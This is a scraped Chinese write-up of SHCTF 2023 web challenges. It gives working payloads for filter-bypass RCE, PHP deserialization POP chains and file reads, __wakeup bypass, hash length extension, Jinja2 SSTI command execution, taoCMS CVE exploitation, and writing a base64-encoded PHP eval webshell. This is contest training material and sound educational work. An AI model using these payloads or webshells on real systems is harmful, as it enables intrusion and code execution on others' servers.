SHCTF-校外赛道 2023 WEB部分题解wp()

[WEEK1]babyRCE

开题,直接给了源码,简单过滤。

SHCTF-校外赛道 2023 WEB部分题解wp()_第1张图片

被过滤 绕过方法
cat/tac uniq
flag fla?
空格 %09

payload:

?rce=ls%09/

?rce=uniq%09/fla?

SHCTF-校外赛道 2023 WEB部分题解wp()_第2张图片

[WEEK1]1zzphp

考点:intval()函数绕过(数组)、PCRE回溯次数限制绕过

直接给了源码:

SHCTF-校外赛道 2023 WEB部分题解wp()_第3张图片

 
error_reporting(0);
highlight_file('./index.txt');
if(isset($_POST['c_ode']) && isset($_GET['num']))
{
    $code = (String)$_POST['c_ode'];
    $num=$_GET['num'];
    if(preg_match("/[0-9]/", $num))
    {
        die("no number!");
    }
    elseif(intval($num))
    {
      if(preg_match('/.+?SHCTF/is', $code))
      {
        die('no touch!');
      }
      if(stripos($code,'2023SHCTF') === FALSE)
      {
        die('what do you want');
      }
      echo $flag;
    }
} 

分析源码,我们若想执行echo $flag;,需要满足if(intval($num));不满足if(preg_match("/[0-9]/", $num))if(preg_match('/.+?SHCTF/is', $code))if(stripos($code,'2023SHCTF') === FALSE)这三个条件。

首先是第一部分,intval()函数绕过(数组),我们要满足$num里面没有数字(preg_match检测不出来),同时满足intval($num)为1(true)。

这里采用数组绕过。preg_math()传入数组参数会直接返回0,同时intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1故此传入?num[]=1,产生错误返回1。

?num[]=1

然后是第二部分,PCRE回溯次数限制绕过。要不满足if(preg_match('/.+?SHCTF/is', $code))if(stripos($code,'2023SHCTF') === FALSE)这两个条件,就是preg_match()函数检测不出字符串什么什么SHCTF,但是stripos()要检测出字符串2023SHCTF

代码有强制类型转换$code = (String)$_POST['c_ode'];,不能采用数组绕过。因为preg_match()函数包含.+?,我们采用PCRE回溯次数限制绕过来绕过preg_match()函数的检测,脚本如下:

import requests

res = requests.post("http://112.6.51.212:32674/?num[]=1",data = {"c_ode":"-"*1000000+"2023SHCTF"})
print(res.text)

SHCTF-校外赛道 2023 WEB部分题解wp()_第4张图片

注意点:

2023SHCTF字符串放后面,因为回溯限制,回溯百万次后就不匹配了(前面的一百万字符),后面2023SHCTF的不会被preg_match()函数匹配。

[WEEK1]ez_serialize

题目描述:听说你会PHP反序列化漏洞?不信,除非can_can_need_flag

直接给了源码:

SHCTF-校外赛道 2023 WEB部分题解wp()_第5张图片

构造简单POP链,学会魔术方法就行了。

__invoke(),调用函数的方式调用一个对象时的回应方法。

__get(),读取不可访问属性的值时,会被调用。

__toString() ,用于一个类被当成字符串时的回应。

链子:

B::__wakeup()->
C::__toString()->
D::__get($key)->
A::__invoke()

过滤不用管,匹配到了只是echo,又不die出。

EXP: (flag文件位置按经验猜)


highlight_file(__FILE__);
class A{
    public $var_1;

    public function __invoke(){
        include($this->var_1);
    }
}
class B{
    public $q;
    public function __wakeup()
    {
    if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->q)) {
            echo "hacker";
        }
    }
}
class C{
    public $var;
    public $z;
    public function __toString(){
        return $this->z->var;
    }
}
class D{
    public $p;
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}
/*
B::__wakeup()->
C::__toString()->
D::__get($key)->
A::__invoke()
*/
$jay17=new B();
$jay17->q=new c();
$jay17->q->var="xxx";
$jay17->q->z=new D();
$jay17->q->z->p=new A();
$jay17->q->z->p->var_1="php://filter/read=convert.base64-encode/resource=flag.php";
echo urlencode(serialize($jay17));

SHCTF-校外赛道 2023 WEB部分题解wp()_第6张图片

[WEEK1]登录就给flag

开题,要求我们登录。

SHCTF-校外赛道 2023 WEB部分题解wp()_第7张图片

直接开始爆破,账号admin。爆破得到密码是password

SHCTF-校外赛道 2023 WEB部分题解wp()_第8张图片

SHCTF-校外赛道 2023 WEB部分题解wp()_第9张图片

[WEEK1]飞机大战

前端游戏题。

SHCTF-校外赛道 2023 WEB部分题解wp()_第10张图片

flag在源码里面,自己解码一下。

SHCTF-校外赛道 2023 WEB部分题解wp()_第11张图片

[WEEK1]ezphp

直接给了源码:
SHCTF-校外赛道 2023 WEB部分题解wp()_第12张图片

仔细阅读逻辑发现,算是没过滤了。是先过滤,再赋值,过滤时候$code总是为空。

if(!preg_match(".....",$code))
    {
        $code=$_GET['code'];

特征代码一下子就能发现。preg_replace()的/e模式存在命令执行漏洞。可以参考:深入研究preg_replace与代码执行 - 先知社区 (aliyun.com)

payload:

GET:?code=${phpinfo()}

POST:pattern=\S*

flag在phpinfo里面。

SHCTF-校外赛道 2023 WEB部分题解wp()_第13张图片

[WEEK1]生成你的邀请函吧~

题目描述:

API:url/generate_invitation  
Request:POST application/json  
Body:{  
    "name": "Yourname",  
    "imgurl": "http://q.qlogo.cn/headimg_dl?dst_uin=QQnumb&spec=640&img_type=jpg"  
}  

使用POST json请求来生成你的邀请函吧flag就在里面哦


开题:

SHCTF-校外赛道 2023 WEB部分题解wp()_第14张图片

应该是考察json格式发包,按照提示来就行了。

SHCTF-校外赛道 2023 WEB部分题解wp()_第15张图片

会下载一个文件。

image-20231002145653058

flag在里面

SHCTF-校外赛道 2023 WEB部分题解wp()_第16张图片

[WEEK2]serialize

直接给了源码,乍一看是PHP反序列化中的POP链构造。

SHCTF-校外赛道 2023 WEB部分题解wp()_第17张图片

一、倒推一下,终点应该是milaoshu::__tostring()

二、misca::__get()方法中的die()函数可以调用milaoshu::__tostring()方法。不要被die吓到,虽然会直接结束运行,但是顺序是先触发milaoshu::__tostring(),再die出程序。

die()exit(),参数可以是字符串和数字,你传个类进去肯定是当作字符串了啊,那就触发了那个类(参数)的__tostring()魔术方法。

SHCTF-校外赛道 2023 WEB部分题解wp()_第18张图片

三、musca::__weakup()方法可以调用misca::__get()方法。

所以最终链子如下:

musca::__weakup()->
misca::__get()->
milaoshu::__tostring()

先造个EXP看看:



class misca{
    public $gao;
    public $fei;
    public $a;
    public function __get($key){
        $this->miaomiao();
        $this->gao=$this->fei;
        die($this->a);
    }
    public function miaomiao(){
        $this->a='Mikey Mouse~';
    }
}
class musca{
    public $ding;
    public $dong;
    public function __wakeup(){
        return $this->ding->dong;
    }
}
class milaoshu{
    public $v;
    public function __tostring(){
        echo"misca~musca~milaoshu~~~";
        include($this->v);
    }
}


$a=new musca();

$a->ding=new misca();
$a->dong="Jay17";   //不存在的属性。

$a->ding->a=&$a->ding->gao;   //变量引用绕过miaomiao()方法。
$a->ding->fei=new milaoshu();

$a->ding->fei->v="/etc/passwd";

echo serialize($a);

生成的payload:

O:5:"musca":2:{s:4:"ding";O:5:"misca":3:{s:3:"gao";N;s:3:"fei";O:8:"milaoshu":1:{s:1:"v";s:11:"/etc/passwd";}s:1:"a";R:3;}s:4:"dong";s:5:"Jay17";}

还剩下两个问题,一是传参,二是绕过正则。

传参问题用PHP字符串解析特性:

PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:

  • 删除空白符
  • 将某些字符( [ 空格 + . )转换为下划线

实际应用:

  • get传参NSS_JAY,不能直接传时,传NSS[JAY。
    //php的变量解析绕过,[ 被处理成 _
  • 当[提前出现后,后面的 . 就不会再被转义成_了。
  • 当这些字符为首字母时,只有点号会被替换成下划线

所以我们GET提交的参数应该是:wanna[fl.ag

绕过正则,我们有两种办法。一是用O:+数字代替O:数字。二是再在外面包一层数组。

方法一:暂时不能用来解本题。

方法二:外面包一层数组



class misca{
    public $gao;
    public $fei;
    public $a;
    public function __get($key){
        $this->miaomiao();
        $this->gao=$this->fei;
        die($this->a);
    }
    public function miaomiao(){
        $this->a='Mikey Mouse~';
    }
}
class musca{
    public $ding;
    public $dong;
    public function __wakeup(){
        return $this->ding->dong;
    }
}
class milaoshu{
    public $v;
    public function __tostring(){
        echo"misca~musca~milaoshu~~~";
        include($this->v);
    }
}


$a=new musca();

$a->ding=new misca();
$a->dong="Jay17";   //不存在的属性。

$a->ding->a=&$a->ding->gao;   //变量引用绕过miaomiao()方法。
$a->ding->fei=new milaoshu();

$a->ding->fei->v="php://filter/read=convert.base64-encode/resource=flag.php";

$b[]=$a;
echo serialize($b);

payload:

?wanna[fl.ag=a:1:{i:0;O:5:"musca":2:{s:4:"ding";O:5:"misca":3:{s:3:"gao";N;s:3:"fei";O:8:"milaoshu":1:{s:1:"v";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}s:1:"a";R:4;}s:4:"dong";s:5:"Jay17";}}

SHCTF-校外赛道 2023 WEB部分题解wp()_第19张图片

[WEEK2]no_wake_up

源码直接给了。

SHCTF-校外赛道 2023 WEB部分题解wp()_第20张图片


highlight_file(__FILE__);
class flag{
    public $username;
    public $code;
    public function __wakeup(){
        $this->username = "guest";
    }
    public function __destruct(){
        if($this->username = "admin"){
            include($this->code);
        }
    }
}
unserialize($_GET['try']);

考察了PHP反序列化绕过__wakeup()。可以看看:绕过__wakeup() 反序列化 合集_Jay 17的博客-CSDN博客

PHP版本是7.0.9

SHCTF-校外赛道 2023 WEB部分题解wp()_第21张图片

我们采用fast-destruct来绕过。原理是GC回收机制。

先写个EXP:


class flag{
    public $username;
    public $code;
    public function __wakeup(){
        $this->username = "guest";
    }
    public function __destruct(){
        if($this->username = "admin"){
            include($this->code);
        }
    }
}

$a=new flag();
$a->username = "admin";
$a->code = "php://filter/read=convert.base64-encode/resource=flag.php";

echo serialize($a);

生成:

O:4:"flag":2:{s:8:"username";s:5:"admin";s:4:"code";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}

删掉末尾的花括号即可触发fast-destruct

payload:

?try=O:4:"flag":2:{s:8:"username";s:5:"admin";s:4:"code";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";

SHCTF-校外赛道 2023 WEB部分题解wp()_第22张图片

[WEEK2]ez_rce***

题目描述:attack subprocess call(攻击子进程调用)

附件给了源码:

from flask import *
import subprocess

app = Flask(__name__)

def gett(obj,arg):
    tmp = obj
    for i in arg:
        tmp = getattr(tmp,i)
    return tmp

def sett(obj,arg,num):
    tmp = obj
    for i in range(len(arg)-1):
        tmp = getattr(tmp,arg[i])
    setattr(tmp,arg[i+1],num)

def hint(giveme,num,bol):
    c = gett(subprocess,giveme)
    tmp = list(c)
    tmp[num] = bol
    tmp = tuple(tmp)
    sett(subprocess,giveme,tmp)

def cmd(arg):
    subprocess.call(arg)


@app.route('/',methods=['GET','POST'])
def exec():
    try:
        if request.args.get('exec')=='ok':
            shell = request.args.get('shell')
            cmd(shell)
        else:
            exp = list(request.get_json()['exp'])
            num = int(request.args.get('num'))
            bol = bool(request.args.get('bol'))
            hint(exp,num,bol)
        return 'ok'
    except:
        return 'error'
    
if __name__ == '__main__':
    app.run(host='0.0.0.0',port=5000)

[WEEK2]MD5的事就拜托了

直接给了源码,考察MD5。

SHCTF-校外赛道 2023 WEB部分题解wp()_第23张图片

整理一下,我们可以通过满足条件得到$flag的MD5和$flag的长度。然后我们需要算出md5($flag.urldecode($num))


一、如何获得$flag的MD5

判断条件:

extract(parse_url($_POST['SHCTF']));
if($$$scheme==='SHCTF'){
	echo(md5($flag));
    echo("
"
); }

函数解释:

parse_url()


$url = 'http://username:password@hostname/path?arg=value#anchor';

print_r(parse_url($url));

输出:
Array
(
    [scheme] => http
    [host] => hostname
    [user] => username
    [pass] => password
    [path] => /path
    [query] => arg=value
    [fragment] => anchor
)

extract():用来将变量从数组中导入到当前的符号表中。

如果要满足$$$scheme==='SHCTF',我们可以使[scheme] => host,导致$$host==='SHCTF';再使得[host] => user导致$user==='SHCTF',就满足条件。

相关数组构建:

Array
(
    [scheme] => host
    [host] => user
    [user] => SHCTF
    [pass] => password
    [path] => /path
    [query] => arg=value
    [fragment] => anchor
)

传参:(POST)

SHCTF=host://SHCTF:password@user/path?arg=value#anchor

得到flag的MD5值:dbef700745bd5917d2c60821aab91d8d

SHCTF-校外赛道 2023 WEB部分题解wp()_第24张图片


二、如何获得$flag的长度

判断条件:

if(isset($_GET['length'])){
	$num=$_GET['length'];
	if($num*100!=intval($num*100)){
		echo(strlen($flag));
		echo("
"
); } }

intval()函数是取整,不保留小数。

传参:(GET)

?length=1.1111111

得到flag长度是42

SHCTF-校外赛道 2023 WEB部分题解wp()_第25张图片

后来验证1.1也可以,想不明白为什么。。。。。

SHCTF-校外赛道 2023 WEB部分题解wp()_第26张图片


三、算出md5($flag.urldecode($num))

$num我们可以自定义。

哈希扩展长度攻击的条件:md5("密文"+"已知字符串")=已知哈希值。由此条件我们可以获得md5("密文"+"处理过的已知字符串")=处理过的已知哈希值

关键思路:我们现在的条件是md5($flag)=已知哈希值,是不是也是md5("$flag少一个花括号"+"}")=已知哈希值

hashpump工具用法:文件夹下开终端(cd进去也可以),输入hashpump

Input Signature                    #现有哈希值(题目给的MD5)
Input Data                         #已知字符串"}"
Input Key Length                   #为密文长度"41"
Input Data to Add                  #为补位后自己加的字符串(自定义)

SHCTF-校外赛道 2023 WEB部分题解wp()_第27张图片

e4d9c26257dc63b7f1a2ae3f9e72fa01

}\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00P\x01\x00\x00\x00\x00\x00\x00Jay17

可以看到返回给我们两行内容,第一行是处理过的哈希值,第二行是处理过的已知字符串。

满足:md5("密文"+"处理过的已知字符串")=处理过的哈希值。就是md5($flag+"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00P\x01\x00\x00\x00\x00\x00\x00Jay17")=e4d9c26257dc63b7f1a2ae3f9e72fa01

\x换成%然后url编码一下就行。

payload:

GET:
?length=%2580%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500P%2501%2500%2500%2500%2500%2500%2500Jay17

POST:
SHCTF=e4d9c26257dc63b7f1a2ae3f9e72fa01

SHCTF-校外赛道 2023 WEB部分题解wp()_第28张图片

[WEEK2]ez_ssti

经典SSTI,GET传参name就行。

SHCTF-校外赛道 2023 WEB部分题解wp()_第29张图片

我们选择用popen函数执行命令,其他五种执行命令方式同理。

先测测os模块在哪

{{x.__class__.__bases__.__getitem__(0).__subclasses__()}}

定位132

SHCTF-校外赛道 2023 WEB部分题解wp()_第30张图片

没有过滤,payload:

?name={{''.__class__.__bases__.__getitem__(0).__subclasses__()[132].__init__.__globals__.popen('tac /flag').read()}}

SHCTF-校外赛道 2023 WEB部分题解wp()_第31张图片

[WEEK2]EasyCMS

开题,是taoCMS

SHCTF-校外赛道 2023 WEB部分题解wp()_第32张图片

这个CMS有两个CVE,分别是CVE-2021-44915CVE-2022-25578

先看CVE-2021-44915

路由/admin/admin.php是后台,登录账号和密码默认是admin、tao,选择管理栏目菜单。

SHCTF-校外赛道 2023 WEB部分题解wp()_第33张图片

点击编辑,然后随便改点内容,提交时候抓包。

SHCTF-校外赛道 2023 WEB部分题解wp()_第34张图片

SHCTF-校外赛道 2023 WEB部分题解wp()_第35张图片

id是注入点。直接拿sqlmap跑就行了。

再看CVE-2022-25578

路由/admin/admin.php是后台,登录账号和密码默认是admin、tao,选择文件管理

SHCTF-校外赛道 2023 WEB部分题解wp()_第36张图片

是否还记得文件上传中的.htaccess配置文件绕过发,在这个文件中加入一句AddType application/x-httpd-php .jpg,将所有jpg文件当作php文件解析。

SHCTF-校外赛道 2023 WEB部分题解wp()_第37张图片

但是这里没有/pictures目录,本来应该在/pictures新建一个jpg文件,内容是一句话马。

SHCTF-校外赛道 2023 WEB部分题解wp()_第38张图片

所以说这里是无法使用CVE-2022-25578来任意命令执行的。

我们等价替换一下,直接改了index.php的源码,内容换成一句话木马。

SHCTF-校外赛道 2023 WEB部分题解wp()_第39张图片

[WEEK3]快问快答

题目描述:

男:尊敬的领导,老师
女:亲爱的同学们
合:大家下午好!
男:伴着优美的音乐,首届SHCTF竞答比赛拉开了序幕。欢迎大家来到我们的比赛现场。

一看就是需要写脚本的题目。要求两秒以内回答,连续回答50题。

SHCTF-校外赛道 2023 WEB部分题解wp()_第40张图片

先抓个包看看,重要请求头如下:

Cookie: PHPSESSID=e313320de60a72577f25da74fb6a3bdb; session=eyJjb3VudGVyIjo1LCJzY29yZSI6MCwic3RhcnRfdGltZSI6MTY5NzcxOTExOS41MzY1NzV9.ZTEjTw.-Xs2_MbzxDUqILiUvJcNdrmsyPk

answer=11

SHCTF-校外赛道 2023 WEB部分题解wp()_第41张图片

再看一下返回包:

SHCTF-校外赛道 2023 WEB部分题解wp()_第42张图片

注意一点,题目替换了一些符号:

题目符号 数学符号
x *
异或 ^
&
÷ // (整除)

根据包和字符替换写的脚本如下:

脚本如下:

#Author:Jay17
import re
import requests
import time

url = 'http://112.6.51.212:32329/'
res = requests.session()      #创建session对象,用来保存当前会话的持续有效性。不创建也可以调用对应的方法发送请求,但是没有cookie,那就无法记录答题数量。
response = res.get(url)   #发get包,获取题目
time.sleep(1)  # 睡一秒

for i in range(1, 99):
    math = ""
    n=0
    resTest = response.text            #获取返回包的内容
    print(response.text)
    for j in range(0, len(resTest)): #遍历获取网页数学表达式,这里建议用正则表达式(re)
        if resTest[j - n] == ":":
            if resTest[j]=="=":
                break
            math = math + resTest[j]
            n+=1

    # strip() 方法用于移除字符串头尾指定的字符(默认为空格或换行符)或字符序列
    math = math.strip('=')      #去掉末尾等号
    math = math.strip(':')  # 去掉开头冒号
    math = math.strip(' ')  # 去掉首尾空格

    #替换字符
    math = re.sub(r'x', '*', math)
    math = re.sub(r'÷', '//', math)
    math = re.sub(r'异或', '^', math)
    math = re.sub(r'与', '&', math)

    print(math)

    num = eval(math)       #计算数学表达式的值

    myData = {   #构造的POST数据
        'answer': num
    }

    # 更新session
    #cookie = res.headers.get("Set-Cookie")
    # 更新http头
    #h_s = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': cookie}
    #监听:,proxies={"http":"127.0.0.1:8080"}
    response = res.post(url, data=myData,proxies={"http":"127.0.0.1:8080"}) #发post包,提交答案,并且获取返回包,获取下一个计算式
    print(response.text)          #打印当前返回包的内容
    time.sleep(1)  # 睡一秒

    if "flag{" in response.text:       #如果返回包里面有flag
        print("\n\n\nFlaggggggggg: ", response.text)
        exit() # 退出当前程序,也可以break

SHCTF-校外赛道 2023 WEB部分题解wp()_第43张图片

[WEEK3]sseerriiaalliizzee

题目描述:don’t want to die

直接给了源码:

SHCTF-校外赛道 2023 WEB部分题解wp()_第44张图片


error_reporting(0);
highlight_file(__FILE__);

class Start{
    public $barking;
    public function __construct(){
        $this->barking = new Flag;
    }
    public function __toString(){
            return $this->barking->dosomething();
    }
}

class CTF{ 
    public $part1;
    public $part2;
    public function __construct($part1='',$part2='') {
        $this -> part1 = $part1;
        $this -> part2 = $part2;
        
    }
    public function dosomething(){
        $useless   = '';
        $useful= $useless. $this->part2;
        file_put_contents($this-> part1,$useful);
    }
}
class Flag{
    public function dosomething(){
        include('./flag,php');
        return "barking for fun!";
        
    }
}

    $code=$_POST['code']; 
    if(isset($code)){
       echo unserialize($code);
    }
    else{
        echo "no way, fuck off";
    }
?> 

第一眼肯定觉得直接反序列化一个Start类,直接就能包含flag.php获得flag了。但是问题是包含了不回显啊。所以我们要重新找条链子。

SHCTF-校外赛道 2023 WEB部分题解wp()_第45张图片

真实链子如下:

Start::__construct()->
Start::__toString()->
CTF::dosomething()

只有一个问题,就是如何绕过死亡die,成功写入文件:

$useless   = '';
$useful= $useless. $this->part2;
file_put_contents($this-> part1,$useful);

我们使用base64绕过,同时这里是不同变量。

全部删掉)

由此原理我们可以构造EXP:


class Start{
    public $barking;
    public function __construct(){
        $this->barking = new Flag;
    }
    public function __toString(){
        return $this->barking->dosomething();
    }
}
class CTF{
    public $part1;
    public $part2;
    public function __construct($part1='',$part2='') {
        $this -> part1 = $part1;
        $this -> part2 = $part2;

    }
    public function dosomething(){
        $useless   = '';
        $useful= $useless. $this->part2;
        file_put_contents($this-> part1,$useful);
    }
}
class Flag{
    public function dosomething(){
        include('./flag,php');
        return "barking for fun!";

    }
}
$a=new Start();
$a->barking=new CTF();
$a->barking->part1="php://filter/convert.base64-decode/resource=17.php";
$a->barking->part2="PD9waHAgZXZhbCgkX1BPU1RbMV0pOw==";

echo serialize($a);

payload:

code=O:5:"Start":1:{s:7:"barking";O:3:"CTF":2:{s:5:"part1";s:50:"php://filter/convert.base64-decode/resource=17.php";s:5:"part2";s:32:"PD9waHAgZXZhbCgkX1BPU1RbMV0pOw==";}}

文件写入成功,但是没有回显或出现乱码。

SHCTF-校外赛道 2023 WEB部分题解wp()_第46张图片

SHCTF-校外赛道 2023 WEB部分题解wp()_第47张图片

原因是base64位数不符合。自己拿在线网站解密一下就知道了。

SHCTF-校外赛道 2023 WEB部分题解wp()_第48张图片

解决办法是补位,在base64的恶意代码前面补两个字符。

SHCTF-校外赛道 2023 WEB部分题解wp()_第49张图片

由此我们最终payload是:

code=O:5:"Start":1:{s:7:"barking";O:3:"CTF":2:{s:5:"part1";s:50:"php://filter/convert.base64-decode/resource=17.php";s:5:"part2";s:34:"aaPD9waHAgZXZhbCgkX1BPU1RbMV0pOw==";}}

SHCTF-校外赛道 2023 WEB部分题解wp()_第50张图片

[WEEK3]gogogo

开题,题目提示我们要变成admin身份。

SHCTF-校外赛道 2023 WEB部分题解wp()_第51张图片

先看看他是怎么判断身份的。应该是cookie中的session。

SHCTF-校外赛道 2023 WEB部分题解wp()_第52张图片

但是头大的是,这个session我们暂时无法解密。

你可能感兴趣的:(CTF赛事,前端)